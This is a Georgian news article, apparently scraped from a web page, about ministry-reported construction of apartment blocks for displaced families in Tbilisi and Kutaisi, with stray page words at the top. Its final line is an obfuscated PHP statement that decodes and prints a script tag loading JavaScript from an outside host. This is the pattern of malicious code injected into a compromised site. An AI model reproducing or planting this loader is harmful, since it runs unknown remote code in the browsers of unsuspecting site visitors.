celsiusi
ავერსი საქკაბელი

ჯანდაცვის სამინისტროს მიერ გავრცელებული ინფორმაციის მიხედვით, თბილისში თვალჭრელიძის ქუჩაზე 2,400 ოჯახისთვის განკუთვნილი 11 კორპუსის სამშენებლო სამუშაოები შეფერხების გარეშე მიმდინარეობს. პროექტის ღირებულება 243 მილიონი ლარია. 

სამინისტროს თანახმად, მშენებლობა მაისში დაიწყო და 2 კორპუსის კარკასი უკვე დასრულებულია. 

დევნილი ოჯახების განსახლების მიზნით, 5 ქალაქში - თბილისში, ქუთაისში, ზუგდიდში, რუსთავსა და ბორჯომში თანამედროვე სტანდარტების შესაბამისი, საცხოვრებელი კომპლექსები შენდება.

"720 ოჯახი განახლდება ქუთაისში - ნიკეას ქუჩაზე, 3 კორპუსის სამშენებლო სამუშაოები ივნისიდან მიმდინარეობს და უკვე დასრულებულია ერთი კორპუსის კარკასის მშენებლობა.

სამუშაო პროცესები აქტიურ რეჟიმში, სტანდარტების სრული დაცვით ხორციელდება და დათქმულ ვადებში დასრულდება.

ზურაბ უტიაშვილი, ქუთაისში, იმ დევნილ ოჯახებსაც შეხვდა, რომლებსაც ბინები მიმდინარე წელს  გადაეცათ - რამდენიმე თვის წინ, ქუთაისში, ახალაშენებულ კორპუსებში საცხოვრებელი ფართი  480-მა ოჯახმა მიიღო.

დევნილი ოჯახებისთვის ღირსეული საცხოვრებელი პირობების შექმნის მიზნით, პრემიერ-მინისტრის გადაწყვეტილებით, განსახლების მასშტაბური პროგრამა, 2022 წელს დაიწყო. პროექტის ფარგლებში, ოკუპირებული ტერიტორიებიდან დევნილთა, შრომის, ჯანმრთელობისა და სოციალური დაცვის სამინისტრო, 2025 წლის ბოლომდე, საცხოვრებელი ფართით, ჯამში, 13 000 ოჯახს დააკმაყოფილებს. აქედან, 7000-ზე მეტ ოჯახს, ახალაშენებულ კორპუსებში, გარემონტებული ბინები გადაეცემა, ხოლო 6000 ოჯახი „სოფლად სახლის“ პროგრამის ფარგლებში განსახლდება,"- ნათქვამია სამინისტროს მიერ გავრცელებულ ინფორმაციაში.  

477
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");